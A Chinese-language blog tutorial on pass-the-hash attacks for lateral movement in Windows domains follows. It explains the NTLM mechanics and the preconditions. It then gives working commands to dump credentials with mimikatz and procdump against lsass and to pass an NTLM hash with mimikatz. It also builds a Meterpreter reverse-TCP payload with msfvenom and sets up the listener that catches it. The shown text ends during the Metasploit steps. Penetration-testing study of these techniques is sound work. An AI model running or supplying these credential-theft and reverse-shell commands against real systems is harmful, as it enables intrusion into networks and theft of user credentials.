【网络安全】内网渗透之PTH攻击

2023-11-13 pwjcw

PTH（哈希传递）攻击

简介

PTH攻击是内网横向移动的一个常用手段。

原理

pth攻击是基于NTLM协议的，参考NTLM协议的认证流程，在质询阶段，服务器生成一个随机数用用户的NTLM hash进行加密，并且将随机数发给用户，用户在本地使用自己的NTLM hash进行加密，发送给服务器端，服务器端进行判断两次加密的内容是否一致，进而来认证，在域环境下通常是经过批量配置域内机器的，也就是说，每个主机的密码可能是相同的，同时也表明NTLM hash值是相同的，结合上面的NTLM认证过程，由此可见，当我们拿到一个域主机之后，通常hash 散列值无法破解出密码，但是我们可以通过NTLM hash来登入其他的主机。

条件

• 当前控制的主机处于域环境
• 目标主机与当前主机有相同的密码
• 当前控制的主机没有打KB2871997补丁，如果打了补丁，只能使用SID为500的Administrator账号

攻击过程

获取HASH

方法一(使用mimikatz获取NTLM)

首先将Mimikatz 上传到我们所控制的域内机器上面，然后通过执行下面命令来获取NTLM hash

privilege::debug
sekurlsa::logonpasswords  #获取hash，这个命令甚至有可能会看到明文密码

“

mimikatz的其他用法

sekurlsa::logonpasswords #获取hash和明文密码（如果可以的话） sekurlsa::ekeys #获取kerberos加密凭证 lsadump::sam # 获取SAM

方法二(Dump lsass进程)

将lsass.exe内存进行dump，然后再想办法进行解密

“

lsass.exe主要是在用户登入的时候，将用户输入的密码加密为NTLM hash，并且与本地的SAM文件中的NTLM hash进行比较

dump的方法不止一种，可以在任务管理器中进行内存转储

也可以下载微软的官方工具procdump进行转储

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

通过mimikatz解密

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

传递hash

方法一(使用mimikatz传递NTLM）

mimikatz.exe "privilege::debug" "sekurlsa::pth /user:Administrator /domain:god /ntlm:c520c63db2fd0788cc4561728343add7"
#/user 对应的是该netlm的用户名
#/domain 对应的是当前域的域名
#/ntlm对应的是ntlm hash

当执行了这个命令之后，就会弹出一个新的cmd窗口，在该cmd创建上执行一些需要身份验证的操作时会携带NTLM Hash，所以无需验证就可以直接通过，如下面通过net use来连接域控的ipc$远程共享

方法二(使用msf传递NTLM)

先使用msf拿到靶机的shell

生成msf的windows 反弹shell

 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.173.4 LPORT=4444 -f exe -o shell.exe

通过webshell将shell.exe上传到靶机上面

允许shell.exe并在kali上面执行下面操作连接shell

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.124.131
set lport 4444
run